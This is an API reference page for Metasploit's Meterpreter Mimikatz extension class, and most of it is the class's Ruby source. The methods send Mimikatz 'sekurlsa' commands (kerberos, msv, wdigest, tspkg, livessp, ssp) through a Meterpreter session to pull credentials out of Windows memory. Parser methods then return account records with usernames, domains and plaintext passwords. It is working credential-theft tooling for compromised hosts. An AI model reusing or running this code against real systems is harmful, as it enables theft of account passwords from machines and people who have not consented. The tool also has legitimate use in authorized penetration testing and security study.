Class: Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz
- Inherits:
-
Rex::Post::Meterpreter::Extension
- Object
- Rex::Post::Meterpreter::Extension
- Rex::Post::Meterpreter::Extensions::Mimikatz::Mimikatz
- Defined in:
- lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb
Overview
Mimikatz extension - grabs credentials from windows memory.
Benjamin DELPY ‘gentilkiwi` blog.gentilkiwi.com/mimikatz
extension converted by Ben Campbell (Meatballs)
Instance Attribute Summary
Attributes inherited from Rex::Post::Meterpreter::Extension
Instance Method Summary collapse
-
#initialize(client) ⇒ Mimikatz
constructor
A new instance of Mimikatz.
- #kerberos ⇒ Object
- #livessp ⇒ Object
- #msv ⇒ Object
- #parse_creds_result(result) ⇒ Object
- #parse_ssp_result(result) ⇒ Object
- #send_custom_command(function, args = []) ⇒ Object
- #send_custom_command_raw(function, args = []) ⇒ Object
- #ssp ⇒ Object
- #tspkg ⇒ Object
- #wdigest ⇒ Object
Constructor Details
#initialize(client) ⇒ Mimikatz
Returns a new instance of Mimikatz.
24 25 26 27 28 29 30 31 32 33 34 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 24 def initialize(client) super(client, 'mimikatz') client.register_extension_aliases( [ { 'name' => 'mimikatz', 'ext' => self }, ]) end |
Instance Method Details
#kerberos ⇒ Object
121 122 123 124 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 121 def kerberos result = send_custom_command('sekurlsa::kerberos') return parse_creds_result(result) end |
#livessp ⇒ Object
106 107 108 109 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 106 def livessp result = send_custom_command('sekurlsa::livessp') return parse_creds_result(result) end |
#msv ⇒ Object
101 102 103 104 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 101 def msv result = send_custom_command('sekurlsa::msv') return parse_creds_result(result) end |
#parse_creds_result(result) ⇒ Object
50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 50 def parse_creds_result(result) details = CSV.parse(result) accounts = [] details.each do |acc| account = { :authid => acc[0], :package => acc[1], :user => acc[2], :domain => acc[3], :password => acc[4] } accounts << account end return accounts end |
#parse_ssp_result(result) ⇒ Object
66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 66 def parse_ssp_result(result) details = CSV.parse(result) accounts = [] return accounts unless details details.each do |acc| next unless acc.length == 5 ssps = acc[4].split(' }') next unless ssps ssps.each do |ssp| next unless ssp s_acc = ssp.split(' ; ') next unless s_acc user = s_acc[0].split('{ ')[1] next unless user account = { :authid => acc[0], :package => acc[1], :user => user, :domain => s_acc[1], :password => s_acc[2], :orig_user => acc[2], :orig_domain => acc[3] } accounts << account end end return accounts end |
#send_custom_command(function, args = []) ⇒ Object
46 47 48 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 46 def send_custom_command(function, args=[]) return Rex::Text.to_ascii(send_custom_command_raw(function, args)) end |
#send_custom_command_raw(function, args = []) ⇒ Object
36 37 38 39 40 41 42 43 44 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 36 def send_custom_command_raw(function, args=[]) request = Packet.create_request('mimikatz_custom_command') request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function) args.each do |a| request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, a) end response = client.send_request(request) return response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT) end |
#ssp ⇒ Object
111 112 113 114 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 111 def ssp result = send_custom_command('sekurlsa::ssp') return parse_ssp_result(result) end |
#tspkg ⇒ Object
116 117 118 119 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 116 def tspkg result = send_custom_command('sekurlsa::tspkg') return parse_creds_result(result) end |
#wdigest ⇒ Object
96 97 98 99 |
# File 'lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb', line 96 def wdigest result = send_custom_command('sekurlsa::wdigest') return parse_creds_result(result) end |